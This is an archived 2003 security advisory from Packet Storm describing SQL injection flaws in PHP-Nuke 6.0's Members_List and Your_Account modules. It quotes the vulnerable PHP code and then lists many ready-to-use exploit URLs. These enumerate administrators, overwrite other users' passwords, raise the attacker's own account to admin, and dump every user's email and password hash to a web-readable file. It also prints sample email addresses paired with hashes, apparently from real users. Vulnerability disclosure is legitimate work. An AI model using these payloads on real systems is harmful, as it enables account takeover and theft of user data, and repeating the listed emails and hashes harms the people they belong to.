what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

phpnuke60.txt

phpnuke60.txt
Posted Mar 10, 2003
Authored by Frog Man | Site phpsecure.info

PHP Nuke 6.0 is vulnerable to multiple SQL injection attacks that will allow an attacker to access member lists, show users by user ID, show moderators, show administrators, privilege escalation, and more.

tags | exploit, php, sql injection
SHA-256 | fe41573d8793ef04be219cd767b52d76999813cb7aff1ed34330fd4dc79bbdee
Download | Favorite | View

phpnuke60.txt

Change Mirror Download

Informations :
°°°°°°°°°°°°°°
Language : PHP
Website : http://www.phpnuke.org
Versions : 6.0 (& 6.5?)
Modules : Members_List, Your_Account
Problem : SQL Injection
PHP Configuration : This will work if magic_quotes_gpc=OFF.


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/modules/Members_List/index.php :

------------------------------------------------------------------------
[...]
        $count = "SELECT COUNT(uid) AS total FROM ".$user_prefix."_users ";
        $select = "select uid, name, uname, femail, url from 
".$user_prefix."_users ";
  $where = "where uname != 'Anonymous' ";

  if ( ( $letter != "Other" ) AND ( $letter != "All" ) ) {
            $where .= "AND uname like '".$letter."%' ";

        } else if ( ( $letter == "Other" ) AND ( $letter != "All" ) ) {
            $where .= "AND uname REGEXP \"^\[1-9]\" ";

        } else {
            $where .= "";
        }
        $sort = "order by $sortby";
        $limit = " ASC LIMIT ".$min.", ".$max;

        $count_result = sql_query($count.$where, $dbi);
        $num_rows_per_order = mysql_result($count_result,0,0);

        $result = sql_query($select.$where.$sort.$limit, $dbi) or die();


        echo "<br>";
        if ( $letter != "front" ) {
            echo "<table width=\"100%\" border=\"0\" 
cellspacing=\"1\"><tr>\n";
            echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font 
color=\"$textcolor2\"><b>"._NICKNAME."</b></font></td>\n";
            echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font 
color=\"$textcolor2\"><b>"._REALNAME."</b></font></td>\n";
            echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font 
color=\"$textcolor2\"><b>"._EMAIL."</b></font></td>\n";
            echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font 
color=\"$textcolor2\"><b>"._URL."</b></font></td>\n";
            $cols = 4;
[...]
------------------------------------------------------------------------


/modules/Your_Account/index.php :
------------------------------------------------------------------------
switch($op) {
[...]
    case "mailpasswd":
  mail_password($uname, $code);
  break;

    case "userinfo":
  userinfo($uname, $bypass, $hid, $url);
  break;

    case "login":
  login($uname, $pass);
  break;
[...]
    case "saveuser":
  saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, 
$bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, 
$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter);
  break;
[...]
    case "savehome":
  savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, 
$popmeson);
  break;

    case "savetheme":
  savetheme($uid, $theme);
  break;
[...]
    case "savecomm":
  savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax);
  break;
[...]
}
------------------------------------------------------------------------


/modules/Your_Account/index.php :
------------------------------------------------------------------------
[...]
function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, 
$vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, 
$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {
    global $user, $cookie, $userinfo, $EditedMessage, $user_prefix, $dbi, 
$module_name;
    cookiedecode($user);
    $check = $cookie[1];
    $check2 = $cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where 
uname='$check'", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) AND ($check2 == $ccpass)) {
  if (!eregi("http://", $url)) {
      $url = "http://$url";
  }
  if ((isset($pass)) && ("$pass" != "$vpass")) {
      echo "<center>"._PASSDIFFERENT."</center>";
  } elseif (($pass != "") && (strlen($pass) < $minpass)) {
      echo "<center>"._YOUPASSMUSTBE." <b>$minpass</b> 
"._CHARLONG."</center>";
  } else {
      if ($bio) { filter_text($bio); $bio = $EditedMessage; $bio = 
FixQuotes($bio); }
      if ($pass != "") {
    cookiedecode($user);
    sql_query("LOCK TABLES ".$user_prefix."_users WRITE", $dbi);
    $pass = md5($pass);
    sql_query("update ".$user_prefix."_users set name='$realname', 
email='$email', femail='$femail', url='$url', pass='$pass', bio='$bio' , 
user_avatar='$user_avatar', user_icq='$user_icq', user_occ='$user_occ', 
user_from='$user_from', user_intrest='$user_intrest', user_sig='$user_sig', 
user_aim='$user_aim', user_yim='$user_yim', user_msnm='$user_msnm', 
newsletter='$newsletter' where uid='$uid'", $dbi);
    $result = sql_query("select uid, uname, pass, storynum, umode, uorder, 
thold, noscore, ublockon, theme from ".$user_prefix."_users where 
uname='$uname' and pass='$pass'", $dbi);
    if(sql_num_rows($result, $dbi)==1) {
        $userinfo = sql_fetch_array($result, $dbi);
        
docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
    } else {
        echo "<center>"._SOMETHINGWRONG."</center><br>";
    }
    sql_query("UNLOCK TABLES", $dbi);
      } else {
    sql_query("update ".$user_prefix."_users set name='$realname', 
email='$email', femail='$femail', url='$url', bio='$bio', 
user_avatar='$user_avatar', user_icq='$user_icq', user_occ='$user_occ', 
user_from='$user_from', user_intrest='$user_intrest', user_sig='$user_sig', 
user_aim='$user_aim', user_yim='$user_yim', user_msnm='$user_msnm', 
newsletter='$newsletter' where uid='$uid'", $dbi);
      if ($attach) {
    $a = 1;
      } else {
    $a = 0;
      }
      }
      Header("Location: modules.php?name=$module_name");
  }
    }
}
[...]
function savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, 
$popmeson) {
    global $user, $cookie, $userinfo, $user_prefix, $dbi, $module_name;
    cookiedecode($user);
    $check = $cookie[1];
    $check2 = $cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where 
uname='$check'", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) AND ($check2 == $ccpass)) {
  if(isset($ublockon)) $ublockon=1; else $ublockon=0;
  $ublock = FixQuotes($ublock);
  sql_query("update ".$user_prefix."_users set storynum='$storynum', 
ublockon='$ublockon', ublock='$ublock', broadcast='$broadcast', 
popmeson='$popmeson' where uid='$uid'", $dbi);
  getusrinfo($user);
  docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
  Header("Location: modules.php?name=$module_name");
    }
}

function savetheme($uid, $theme) {
    global $user, $cookie, $userinfo, $user_prefix, $dbi, $module_name;
    cookiedecode($user);
    $check = $cookie[1];
    $check2 = $cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where 
uname='$check'", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) AND ($check2 == $ccpass)) {
  sql_query("update ".$user_prefix."_users set theme='$theme' where 
uid='$uid'", $dbi);
  getusrinfo($user);
  docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
  Header("Location: modules.php?name=$module_name&theme=$theme");
    }
}
[...]
function savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, 
$commentmax) {
    global $user, $cookie, $userinfo, $user_prefix, $dbi, $module_name;
    cookiedecode($user);
    $check = $cookie[1];
    $check2 = $cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where 
uname='$check'", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) AND ($check2 == $ccpass)) {
  if(isset($noscore)) $noscore=1; else $noscore=0;
  sql_query("update ".$user_prefix."_users set umode='$umode', 
uorder='$uorder', thold='$thold', noscore='$noscore', 
commentmax='$commentmax' where uid='$uid'", $dbi);
  getusrinfo($user);
  docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
  Header("Location: modules.php?name=$module_name");
    }
}
[...]
------------------------------------------------------------------------



/modules/Your_Account/index.php :
------------------------------------------------------------------------
[...]
function mail_password($uname, $code) {
    global $sitename, $adminmail, $nukeurl, $user_prefix, $dbi, 
$module_name;
    $result = sql_query("select email, pass from ".$user_prefix."_users 
where (uname='$uname')", $dbi);
    if(!$result) {
  include("header.php");
  OpenTable();
  echo "<center>"._SORRYNOUSERINFO."</center>";
  CloseTable();
  include("footer.php");
[...]
------------------------------------------------------------------------


------------------------------------------------------------------------
[...]
function userinfo($uname, $bypass=0, $hid=0, $url=0) {
    global $user, $cookie, $sitename, $prefix, $user_prefix, $dbi, $admin, 
$broadcast_msg, $my_headlines, $module_name;
    $result = sql_query("select uid, femail, url, bio, user_avatar, 
user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_intrest, 
user_sig, pass, newsletter from ".$user_prefix."_users where 
uname='$uname'", $dbi);
    $userinfo = sql_fetch_array($result, $dbi);
[...]
------------------------------------------------------------------------



------------------------------------------------------------------------
[...]
function login($uname, $pass) {
    global $setinfo, $user_prefix, $dbi, $module_name;
    $result = sql_query("select pass, uid, storynum, umode, uorder, thold, 
noscore, ublockon, theme, commentmax from ".$user_prefix."_users where 
uname='$uname'", $dbi);
    $setinfo = sql_fetch_array($result, $dbi);
[...]
}
[...]
------------------------------------------------------------------------




Exploits :
°°°°°°°°°°
Members_List :
- Show users (order by crypted pass) :
http://[target]/modules.php?name=Members_List&letter=All&sortby=pass

- Show users (order by UID) :
http://[target]/modules.php?name=Members_List&letter=All&sortby=uid

- Show moderators :
http://[target]/modules.php?name=Members_List&letter='%20OR%20user_level='2'/*

- Show administrators :
http://[target]/modules.php?name=Members_List&letter='%20OR%20user_level='4'/*

- Show all users having a crypted pass beginning with 'abc' :
http://[target]/modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'abc%25'/*

- Etc...


Your_Account :
- Change the name of 'Admin' user into "hophophop" :

http://[target]/modules.php?name=Your_Account&op=savetheme&theme=',name='Hophophop'%20where%20uname='Admin'/*&uid=[OUR_UID]

- Change the Bob's password INTO md5_decrypted 
'd41d8cd98f00b204e9800998ecf8427e' :

http://[target]/modules.php?name=Your_Account&op=savetheme&theme=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=saveuser&realname=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=saveuser&email=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savehome&storynum=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savehome&ublockon=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savecomm&umode=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savecomm&thold=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]


or...or... and or again :p


- Change our own user account level into admin level :
http://[target]/modules.php?name=Your_Account&op=savetheme&theme=',user_level='4&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=saveuser&femail=',user_level='4&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=saveuser&url=http://',user_level='4&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savehome&broadcast=',user_level='4&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savecomm&uorder=',user_level='4&uid=[OUR_UID]
or etc...




- Save all users' email & crypted password into 
http://[target]/AllMailPass.txt :

http://[target]/modules.php?name=Your_Account&op=mailpasswd&uname=')%20OR%201=1%20INTO%20OUTFILE%20'/[path/to/site]/AllMailPass.txt'/*

It will give in http://[target]/AllMailPass.txt anything like :
--------------------------------------------------------
chaeyut@yahoo.com  a34e83e6658923ceb100abb52cd31df6
for-ever@yahoo.com  5728cea4924d9097c78d08165ad1dd8a
runbur@netzero.com  546fa9501a436d4615b798f856386ba8
venom@yahoo.com    614edfbc874f09d75b98240295a8f39f
gotchakd@yahoo.de  fbd125e74581979d2b7fc6e2b360e286
cfischer@mindspring.com  9407c826d8e3c07ad37cb2d13d1cb641
mike@xiradio.com  f9ac6b05beccb0fc5837b6a7fef4c1d3
mikdif@yahoo.com  6106edf3e22b0cd8609fa1112d0ae962
mcurry@hotmail.com  739897be3e14cf5a9fb032069f522b77
--------------------------------------------------------

(crypted password can be sent by cookie to access to the account).


- Save the informations about users wich have an uid between 190 and 196 
into http://[target]/1.txt :

http://[target]/modules.php?name=Your_Account&op=userinfo&uname='%20OR%20uid>190%20AND%20uid<196%20INTO%20OUTFILE%20'/[path/to/site]/1.txt



- Save all informations about admins, moderators,... into 
http://[target]/admintxt :

http://[target]/modules.php?name=Your_Account&op=login&uname='%20OR%user_level>1%20INTO%20OUTFILE%20'/[path/to/site]/admin.txt



etc etc ... !


[path/to/site] can be found (for example) on 
http://[target]/modules/Forums/bb_smilies.php (Path Disclosure Security 
Hole).


Solution :
°°°°°°°°°°
A patch has been created and published on http://www.phpsecure.info .


More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/PHP-Nuke6.0-Members_List-Your_Account.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHP-Nuke6.0-Members_List-Your_Account.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools



Credits :
°°°°°°°°°
Greetz to T. Rodriguez, [RaFa], Webotheque.be
Author : frog-m@n
http://www.phpsecure.info .


_________________________________________________________________
Utilisez votre MSN Messenger via votre GSM ! 
http://www.fr.msn.be/gsm/servicesms/messengerparsms

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close